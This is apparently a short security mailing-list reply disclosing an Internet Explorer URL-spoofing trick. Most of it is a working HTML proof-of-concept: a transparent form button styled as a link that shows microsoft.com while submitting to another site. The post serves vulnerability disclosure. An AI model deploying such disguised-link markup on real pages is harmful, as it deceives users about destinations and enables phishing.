Re: New URL spoofing bug in Microsoft Internet Explorer
I also want to play
<base href="http://www.microsoft.com">
<a href=><form action="http://www.malware.com"
method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt;
FONT-SIZE: 10pt; BORDER-LEFT: 0pt;
CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR:
transparent;TEXT-DECORATION: underline" type=submit
value=http://www.microsoft.com></form></a>
This still works in IE 6 SP2 XP 123 whatever, since patched and
from back in March 2004 [see:
http://www.securityfocus.com/bid/10023 ]. Only difference being
the base href and open a href.
http://www.malware.com/mwaresoft.html
Interestingly Outlook Express gets it right this time.
--
http://www.malware.com